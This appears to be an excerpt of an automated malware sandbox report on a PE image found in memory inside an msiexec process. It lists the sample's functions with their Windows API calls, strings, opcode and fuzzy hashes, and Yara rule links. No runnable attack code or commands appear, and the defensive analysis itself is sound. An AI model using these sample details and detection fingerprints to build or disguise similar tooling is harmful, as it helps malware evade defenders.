                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                              • String ID:
                                                              • API String ID: 822687973-0
                                                              • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                              • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                              • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                              • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                              Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                                              • malloc.MSVCRT ref: 00417459
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7622DF80,?,0041755F,?), ref: 00417478
                                                              • free.MSVCRT ref: 0041747F
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$freemalloc
                                                              • String ID:
                                                              • API String ID: 2605342592-0
                                                              • Opcode ID: 4f6da64b03b6c84002c909cf9dcc8042fee6eba1d3d37644ca2334bf0aecddb0
                                                              • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                              • Opcode Fuzzy Hash: 4f6da64b03b6c84002c909cf9dcc8042fee6eba1d3d37644ca2334bf0aecddb0
                                                              • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                              Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                              • RegisterClassW.USER32(?), ref: 00412428
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                              • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: HandleModule$ClassCreateRegisterWindow
                                                              • String ID:
                                                              • API String ID: 2678498856-0
                                                              • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                              • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                              • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                              • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                              Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,?), ref: 00409B40
                                                              • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                              • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                              • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Item
                                                              • String ID:
                                                              • API String ID: 3888421826-0
                                                              • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                              • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                              • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                              • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                              Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00417B7B
                                                              • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                              • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                              • GetLastError.KERNEL32 ref: 00417BB5
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$ErrorLastLockUnlockmemset
                                                              • String ID:
                                                              • API String ID: 3727323765-0
                                                              • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                              • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                              • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                              • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                              Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040F673
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                              • strlen.MSVCRT ref: 0040F6A2
                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                              • String ID:
                                                              • API String ID: 2754987064-0
                                                              • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                              • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                              • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                              • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                              Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040F6E2
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                              • strlen.MSVCRT ref: 0040F70D
                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                              • String ID:
                                                              • API String ID: 2754987064-0
                                                              • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                              • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                              • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                              • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                              Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00402FD7
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                              • strlen.MSVCRT ref: 00403006
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                              • String ID:
                                                              • API String ID: 2754987064-0
                                                              • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                              • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                              • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                              • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                              Function 00414770 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcscpy$CloseHandle
                                                              • String ID: General
                                                              • API String ID: 3722638380-26480598
                                                              • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                              • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                              • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                              • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                              Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                              • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                              • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                              • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                              • GetStockObject.GDI32(00000000), ref: 004143C6
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                              • String ID:
                                                              • API String ID: 764393265-0
                                                              • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                              • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                              • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                              • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                              Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Time$System$File$LocalSpecific
                                                              • String ID:
                                                              • API String ID: 979780441-0
                                                              • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                              • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                              • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                              • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                              Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                              • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                              • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$DialogHandleModuleParam
                                                              • String ID:
                                                              • API String ID: 1386444988-0
                                                              • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                              • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                              • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                              • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                              Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                              • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                              • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                              • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                              Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                              • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: InvalidateMessageRectSend
                                                              • String ID: d=E
                                                              • API String ID: 909852535-3703654223
                                                              • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                              • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                              • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                              • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                              Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • wcschr.MSVCRT ref: 0040F79E
                                                              • wcschr.MSVCRT ref: 0040F7AC
                                                                • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcschr$memcpywcslen
                                                              • String ID: "
                                                              • API String ID: 1983396471-123907689
                                                              • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                              • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                              • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                              • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                              Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                              • _memicmp.MSVCRT ref: 0040C00D
                                                              • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FilePointer_memicmpmemcpy
                                                              • String ID: URL
                                                              • API String ID: 2108176848-3574463123
                                                              • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                              • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                              • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                              • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                              Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _snwprintf.MSVCRT ref: 0040A398
                                                              • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfmemcpy
                                                              • String ID: %2.2X
                                                              • API String ID: 2789212964-323797159
                                                              • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                              • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                              • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                              • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                              Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _snwprintf
                                                              • String ID: %%-%d.%ds
                                                              • API String ID: 3988819677-2008345750
                                                              • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                              • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                              • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                              • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                              Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040E770
                                                              • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSendmemset
                                                              • String ID: F^@
                                                              • API String ID: 568519121-3652327722
                                                              • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                              • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                              • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                              • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                              Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PlacementWindowmemset
                                                              • String ID: WinPos
                                                              • API String ID: 4036792311-2823255486
                                                              • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                              • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                              • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                              • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                              Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                              • DeleteObject.GDI32(00000000), ref: 004125E7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??3@DeleteObject
                                                              • String ID: r!A
                                                              • API String ID: 1103273653-628097481
                                                              • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                              • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                              • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                              • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                              Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                              • wcsrchr.MSVCRT ref: 0040DCE9
                                                              • wcscat.MSVCRT ref: 0040DCFF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileModuleNamewcscatwcsrchr
                                                              • String ID: _lng.ini
                                                              • API String ID: 383090722-1948609170
                                                              • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                              • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                              • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                              • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                              Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                              • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                              • API String ID: 2773794195-880857682
                                                              • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                              • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                              • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                              • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                              Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                              • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                              • memset.MSVCRT ref: 0042BAAE
                                                              • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID:
                                                              • API String ID: 438689982-0
